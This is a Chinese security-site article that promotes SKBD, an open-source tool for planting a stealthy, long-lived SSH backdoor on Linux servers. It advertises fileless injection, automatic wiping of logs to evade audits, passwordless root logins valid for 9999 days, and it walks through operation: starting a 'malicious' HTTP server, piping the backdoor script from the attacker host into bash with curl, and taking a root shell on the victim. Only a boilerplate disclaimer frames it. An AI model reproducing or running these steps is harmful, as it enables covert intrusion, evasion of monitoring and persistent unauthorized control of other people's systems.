freeBuf
主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

点我创作

试试在FreeBuf发布您的第一篇文章 让安全圈留下您的足迹
我知道了

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

SKBD(Scorpion-Killer) Linux-SSH长期隐藏后门持久化控制注入工具
maptnh 2025-03-30 21:22:53 11954
所属地 海外

其他工具: Tyran(暴君) 后渗透持久化控制

地址:https://github.com/MartinxMax/tyrant

4bd70646a60cef5503b218fde4e1960.jpg

SKBD (Scorpion-Killer)

地址:https://github.com/MartinxMax/skbd

logo.png

Linux-SSH后门注入持久化控制工具

  1. 无文件保存自动化后门注入
    使用curl请求,该工具能够自动执行后门注入操作,而不会在系统上留下任何显著的痕迹。

  2. 自动痕迹日志清理
    在后门注入过程中,该工具能够自动清除相关日志和痕迹,确保在监控和审计过程中不会触发警报。

  3. CA证书绕过监测
    通过利用CA证书机制,该工具能够绕过SSH服务器证书验证检查,进一步增强隐蔽性和持久性。

  4. 27年期限SSH后门
    注入的SSH后门最多可持续27年(9999天),确保长期访问和控制系统。

  5. 多个无密码用户的SSH登录
    支持多个SSH用户独立登录,且不需要密码,提高了灵活性和隐蔽性。

  6. 可移植性与数据迁移
    该工具允许将machines中的所有文件打包并发送给其他用户,支持无缝迁移,实现跨系统部署控制。


使用方法

PS:此脚本必须以ROOT权限执行。

skbd.py : 服务端 (API)

$ python3 skbd.py -h

image.png

skbdexec.py : 服务端 (命令执行)

$ python3 skbdexec.py

image-1.png

skbd.sh : 客户端 (载入skbd后门)

$ ./skbd.sh

image-2.png


示例:

  1. 启动恶意HTTP服务器

$ python3 -m http.server 8181

image-4.png

  1. 启动服务端 (API):

$ python3 skbd.py

image-5.png

endpoint: https://192.168.0.115:9191

  1. 启动服务端 (命令执行):
    PSskbdexec.py可以随时启动。

$ python3 skbdexec.py

image-6.png

  1. 向客户端注入skbd后门

$ curl http://<IP>:<PORT>/skbd.sh|bash -s -- -e 'https://<IP>:PORT'

image-3.png

  1. 在服务端(命令执行)访问客户端Shell:

SKBD # info

image-7.png

SKBD # use 1

SKBD[f6b50eecbeca4b61a7e8932c3e9cf9f2]# show

image-8.png

+-------------------------------------------+-------------------------------------------+
| Configuring Machine: f6b50eecbeca4b61a7e8932c3e9cf9f2    |
+-------------------------------------------+-------------------------------------------+
| Parameter          | Value                            |
+-------------------------------------------+-------------------------------------------+
| users              | root,postgres,map                 | (Editable) |
| ips                | 192.168.0.111,                    | (Editable) |
| sn                 | f6b50eecbeca4b61a7e8932c3e9cf9f2  | (Editable) |
+-------------------------------------------+-------------------------------------------+

此列表显示了客户端可进行SSH登录的用户(root,postgres,map)。可以通过使用命令set user map来更改已登录的用户会话。

SKBD[f6b50eecbeca4b61a7e8932c3e9cf9f2]# set user root

最终的登录参数:

+-------------------+-------------------+
| user: root        |
| ip: 192.168.0.111 |
| port: 22          |
+-------------------+-------------------+

SKBD[f6b50eecbeca4b61a7e8932c3e9cf9f2]# run

image-9.png

# 黑客 # 网络安全 # 数据泄露 # 数据安全
免责声明
1.一般免责声明:本文所提供的技术信息仅供参考,不构成任何专业建议。读者应根据自身情况谨慎使用且应遵守《中华人民共和国网络安全法》,作者及发布平台不对因使用本文信息而导致的任何直接或间接责任或损失负责。
2. 适用性声明:文中技术内容可能不适用于所有情况或系统,在实际应用前请充分测试和评估。若因使用不当造成的任何问题,相关方不承担责任。
3. 更新声明:技术发展迅速,文章内容可能存在滞后性。读者需自行判断信息的时效性,因依据过时内容产生的后果,作者及发布平台不承担责任。
本文为 maptnh 独立观点,未经授权禁止转载。
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
HackTheBox
Exploit-Tools@S-H4CK13
maptnh LV.9
Ценность жизни выше, чем кража данных.
  • 342 文章数
  • 63 关注者
[CISSP] [7] PKI和密码应用
2025-04-03
[CISSP] [6] 密码学和对称密钥算法
2025-04-03
[CISSP] [5] 保护资产安全
2025-04-02
文章目录